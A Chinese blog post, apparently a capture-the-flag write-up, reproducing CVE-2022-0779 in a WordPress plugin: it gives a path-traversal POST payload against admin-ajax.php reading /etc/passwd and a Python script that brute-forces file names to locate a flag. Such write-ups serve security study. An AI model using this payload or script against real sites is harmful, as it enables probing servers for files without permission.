当前位置: 首页 > news >正文

CVE-2022-0779

news 2026/5/12 19:58:40

CVE-2022-0779复现
image
使用网上的资料查看/wp-admin/admin-ajax.php这个网页,使用bp抓包,修改为POST方法,输入field_name=test&filepath=/../../../../../../../../etc/passwd&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=a889600f9e&is_ajax=true
其中的pf_nonce在源码里面
image
bp发包
image
返回值中如果有"umRemoveFile"就说明该文件存在
根据题目提示访问1.txt文件
image
里面说明了flag在哪个文件里面
写一个代码随机生成字符串,在测试它是否存在,最后获得flag存在的文件

点击查看代码 
import requestsdef getInfo(file):headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","Accept": "*/*",}url = "https://eci-2ze4bj42p1b9qgqs96v7.cloudeci1.ichunqiu.com:80/wp-admin/admin-ajax.php"data = {'field_name': 'test','filepath': '/../../../../../../../../flagfile/' + file,'field_id': 'um_field_4','form_key': 'Upload','action': 'um_show_uploaded_file','pf_nonce': 'a889600f9e','is_ajax': True,'field_name': 'test',}r = requests.post(url, headers=headers, data=data)if "umRemoveFile" in r.text:return Trueelse:return Falseif __name__ == '__main__':key = '1234567890abcdefghijklmnopqrstuvwxyz'for i in range(0, 10):for w in key:file = str(i) + str(w)if getInfo(file):print(w, end="")break
运行代码获得文件名

image

输入文件名获得flag
image

http://www.jsqmd.com/news/119997/

相关文章:

  • CVE-2022-0779
  • 延凡智慧水库系统:数字孪生+AI驱动水库安全与智能调度
  • 从高频政策热词看经济“新风口”与资本流向
  • DaemonSet service ingress的 - 教程
  • vn_pwn_easyTHeap PWN tcache_perthread_struct利用
  • 用 .NET MAUI 10 + VS Copilot 从 0 开发一个签到 App(一)
  • RAG vs. 微调:让AI变聪明的两种方式,该怎么选?
  • 人工智能AGI
  • RAG vs. 微调:让AI变聪明的两种方式,该怎么选?
  • 边缘AI与端云协同架构
  • 一文读懂大模型微调:从全参数到LoRA,打造你的专属AI专家
  • Flutter 实现一个容器内部元素可平移、缩放和旋转等功能(六)
  • 企业级知识库架构图解:从“玩具“到“工具“的蜕变之路,解决大模型上下文坍塌问题
  • 大模型核心技术:微调、推理与优化详细指南,推荐收藏!
  • 为什么食管癌发现都是晚期--转自杭州日报
  • 基于YOLOv10的花生种子霉变检测系统(YOLOv10深度学习+YOLO数据集+UI界面+Python项目+模型)
  • 2026行业展望——大模型,非常详细收藏这一篇就够了
  • 零代码上手Google Gemini 3:5种实用方法大揭秘
  • 2025最新大语言模型学习路线:零基础入门到实战全指南(建议收藏)_大模型保姆级教程
  • 用FastAPI构建爬虫接口服务:让爬虫变成可调用的API - 详解
  • 今天教大家免费使用先进的AI大模型,非常详细收藏这一篇就够了
  • 基于YOLOv10的鸡检测系统(YOLOv10深度学习+YOLO数据集+UI界面+Python项目+模型)
  • AI大模型的详细完整学习路线,从入门到精通,非常详细收藏这一篇就够了
  • 基于YOLOv10的昆虫识别检测系统(YOLOv10深度学习+YOLO数据集+UI界面+Python项目+模型)
  • iOS 商店上架全流程解析 从工程准备到审核通过的系统化实践指南 - 详解
  • 掌握这六点轻松入门LangGraph1.0,非常详细
  • iOS 商店上架全流程解析 从工程准备到审核通过的系统化实践指南 - 详解
  • 2025年度开发趋势有感
  • vivo 前端三剑客发展历程及原理揭秘
  • 【iOS】多线程学习 - 指南